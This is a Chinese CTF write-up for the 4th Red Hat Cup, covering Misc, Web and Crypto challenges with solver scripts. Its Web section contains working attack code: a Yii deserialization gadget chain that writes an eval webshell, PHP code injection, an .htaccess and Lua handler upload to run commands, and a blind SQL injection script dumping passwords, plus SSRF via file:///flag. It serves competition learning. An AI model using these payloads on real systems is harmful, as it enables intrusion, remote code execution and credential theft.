当前位置:网站首页>第四届红帽杯网络安全大赛
第四届红帽杯网络安全大赛
2022-08-10 20:30:00 【MssnHarvey】
Misc
签到
附件(提取码:zlxu)
EBCDIC解码得到flag
colorful code
附件(提取码:h3w8)
data2三个一组转RGB,然后data1里的数字就是对应的RGB的位置,然后根据data1的字符数量分解质因数得到宽高,最后画图去npiet解
附上脚本:
from PIL import Image
import matplotlib.pyplot as plt
f1 = open('data1')
c1 = f1.read()
c1 = c1.split(' ')
print(c1)
print(len(c1))
f = open('data2','rb')
c = f.read()
res = []
for i in range(len(c)//3):
yyy = c[i*3:i*3+3]
r,g,b = yyy[0],yyy[1],yyy[2]
res.append((r,g,b))
print(len(res))
print(res)
rr = []
for i in c1[:-1]:
rr.append(res[int(i)])
print(rr)
a = 191
b = 37
img = Image.new('RGB',(b,a),(255,255,255))
for j in range(b):
for i in range(a):
img.putpixel((j,i),rr[i+j*a])
plt.imshow(img)
img.save('flag.png')
Web
find_it
发送个get请求(//?code=<?=phpinfo();?>
),然后访问hack.php即可得到flag
framework
反序列化
<?php
namespace yii\rest{
class CreateAction{
public $checkAccess;
public $id;
public function __construct(){
$this->checkAccess = 'assert';
$this->id = 'file_put_contents("php://filter/write=convert.base64-decode/resource=/var/www/html/web/assets/5118a5d1/fonts/b.php","PD9waHAgZXZhbCgkX0dFVFthXSk7Pz4K")';
$this->modelClass='DynamicModel';
$this->scenario='111';
}
}
}
namespace Faker{
use yii\rest\CreateAction;
class Generator{
protected $formatters;
public function __construct(){
$this->formatters['close'] = [new CreateAction(), 'run'];
}
}
}
namespace yii\db{
use Faker\Generator;
class BatchQueryResult{
private $_dataReader;
public function __construct(){
$this->_dataReader = new Generator;
}
}
}
namespace{
echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>
#http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/index.php?r=site%2Fabout&message=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjE6InlpaVxyZXN0XENyZWF0ZUFjdGlvbiI6NDp7czoxMToiY2hlY2tBY2Nlc3MiO3M6NjoiYXNzZXJ0IjtzOjI6ImlkIjtzOjE1MToiZmlsZV9wdXRfY29udGVudHMoInBocDovL2ZpbHRlci93cml0ZT1jb252ZXJ0LmJhc2U2NC1kZWNvZGUvcmVzb3VyY2U9L3Zhci93d3cvaHRtbC93ZWIvYXNzZXRzLzUxMThhNWQxL2ZvbnRzL2IucGhwIiwiUEQ5d2FIQWdaWFpoYkNna1gwZEZWRnRoWFNrN1B6NEsiKSI7czoxMDoibW9kZWxDbGFzcyI7czoxMjoiRHluYW1pY01vZGVsIjtzOjg6InNjZW5hcmlvIjtzOjM6IjExMSI7fWk6MTtzOjM6InJ1biI7fX19fQ==
接着构造payload:
http://eci-2zeab1jn4vnk38xn572o.cloudeci1.ichunqiu.com/assets/5118a5d1/fonts/harvey.php?a=eval($_POST[harvey]);
然后蚁剑成功连接,发现ua绕过保护执行命令,参考西湖论剑_web1.docx;
于是我们分别上传 .htaccess 和 3.lua 这两个文件
AddHandler lua-script .lua
require "string"
--[[
This is the default method name for Lua handlers, see the optional
function-name in the LuaMapHandler directive to choose a different
entry point.
--]]
function handle(r)
r.content_type = "text/plain"
r:puts("Hello Lua World!\n")
local t = io.popen('/readflag')
local a = t:read("*all")
r:puts(a)
if r.method == 'GET' then
for k, v in pairs( r:parseargs() ) do
r:puts( string.format("%s: %s\n", k, v) )
end
else
r:puts("Unsupported HTTP method " .. r.method)
end
end
最后去访问 3.lua 即可得到flag
WebsiteManger
sql盲注
import requests
url='http://eci-2zeg1tmyhxfbqrmxi9m1.cloudeci1.ichunqiu.com/image.php?id=3'
payload='^((ascii(substr((select(group_concat(password))from(users)),{},1)))={})'
s='1234567890abcdef'
for i in range(1,30):
for b in s:
payloads=payload.format(i,ord(b))
a=requests.get(url+payloads)
#print(url+payloads)
if len(a.text)<19000:
print(b)
break
else:
pass
跑下脚本得到密码:dd6005ef9c77d5ae820ba;进而成功登录
然后ssrf,file:///flag得到flag
Crypto(原题)
primegame
附件(提取码:rlgc)
源自Baby Bubmi的wp:http://www.secmem.org/blog/2020/09/20/poka-science-war-hacking/
附上脚本:
import math
from decimal import *
import random
import struct
getcontext().prec = int(100)
primes = [2]
for i in range(3, 100):
f = True
for j in primes:
if i * i < j:
break
if i % j == 0:
f = False
break
if f:
primes.append(i)
keys = []
for i in range(len(primes)):
keys.append(Decimal(int(primes[i])).ln())
arr = []
for v in keys:
arr.append(int(v * int(16) ** int(64)))
ct = 597952043660446249020184773232983974017780255881942379044454676980646417087515453
def encrypt(res):
h = Decimal(int(0))
for i in range(len(keys)):
h += res[i] * keys[i]
ct = int(h * int(16)**int(64))
return ct
def f(N):
ln = len(arr)
A = Matrix(ZZ, ln + 1, ln + 1)
for i in range(ln):
A[i, i] = 1
A[i, ln] = arr[i] // N
A[ln, i] = 64
A[ln, ln] = ct // N
res = A.LLL()
for i in range(ln + 1):
flag = True
for j in range(ln):
if -64 <= res[i][j] < 64:
continue
flag = False
break
if flag:
vec = [int(v + 64) for v in res[i][:-1]]
ret = encrypt(vec)
if ret == ct:
print(N, bytes(vec))
else:
print("NO", ret, bytes(vec))
for i in range(2, 10000):
print(i)
f(i)
hpcurve
附件(提取码:97js)
源自 hxpCTF2020 的 hyper 的官方wp:https://jsur.in/posts/2020-12-21-hxp-ctf-2020-hyper-writeup
附上脚本:
import itertools
import struct
p = 10000000000000001119
R.<x> = GF(p)[]; y=x
f = y + prod(map(eval, 'yyyyyyy'))
C = HyperellipticCurve(f, 0)
J = C.jacobian()
Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
known_pt = b"a"*20 + b"flag"
rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
ui = [int.from_bytes(r, 'little') for r in blocks]
u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
L = GF(p).algebraic_closure()
roots = [r[0] for r in u.change_ring(L).roots()]
RR.<zz> = PolynomialRing(L)
v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
vi = [v.coefficients()[i].as_finite_field_element()[1] for i in range(3)]
vi = [(int(-c), int(c)) for c in vi]
for rs in itertools.product(*vi):
q = struct.pack('<'+'Q'*len(rs), *rs)
flag = bytes(k^^m for k,m in zip(2*(rng_output+q), enc))
print(flag)
边栏推荐
- 【语义分割】2016-SegNet TPAMI
- C 语言 时间函数使用技巧(汇总)
- Tf ferritin particles contain cisplatin / oxaliplatin / doxorubicin / methotrexate MTX / paclitaxel PTX and other drugs
- (10) Sequence and deserialization of image data
- Ransom Letter Questions and Answers
- (12) findContours function hierarchy explanation
- Oracle 的开窗函数使用详解(二)
- 2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th
- 铁蛋白颗粒Tf包载多肽/凝集素/细胞色素C/超氧化物歧化酶/多柔比星(定制服务)
- 大小端的理解以及宏定义实现的理解
猜你喜欢
(10) Sequence and deserialization of image data
机器学习笔记:t-SNE
(十二) findContours函数的hierarchy详解
npm warn config global `--global`, `--local` are deprecated. use `--location=global` instead.
Demis Hassabis:AI 的强大,超乎我们的想象
Web3中值得关注的基础设施
【语义分割】2017-PSPNet CVPR
TortoiseSVN小乌龟的使用
win10 xbox录屏功能不能录声音怎么办
The 2021 ICPC Asia Shanghai Regional Programming Contest D、E
随机推荐
LeetCode 1-10题
The 2021 ICPC Asia Shanghai Regional Programming Contest D、E
深度学习实战教程(一):感知器
Getting started with kuberentes Auditing
1D Array Dynamics and Question Answers
姜还是老的辣,看看老战哥的老底儿和严谨劲儿
报错:runtime error: reference binding to null pointer of type ‘std::vector<int, std::allocator<int>>‘
(十二) findContours函数的hierarchy详解
测试开发【Mock 平台】08 开发:项目管理(四)编辑功能和Component抽离
多线程与高并发(五)—— 源码解析 ReentrantLock
2019河北省大学生程序设计竞赛部分题题解
参天生长大模型:昇腾AI如何强壮模型开发与创新之根?
一次由groovy引起的fullGC问题排查
Tf ferritin particles contain cisplatin / oxaliplatin / doxorubicin / methotrexate MTX / paclitaxel PTX and other drugs
Water-soluble alloy quantum dot nanozymes|CuMoS nanozymes|porous silicon-based Pt(Au) nanozymes|[email protected] nanomimetic e
svg+元素js实现在图片上描点成框,并获取相对图片的坐标位置
.NET现代应用的产品设计 - DDD实践
OPPO Enco X2 迎来秋季产品升级 旗舰体验全面拉满
A fullGC problem troubleshooting caused by groovy
Tf铁蛋白颗粒包载顺铂/奥沙利铂/阿霉素/甲氨蝶呤MTX/紫杉醇PTX等药物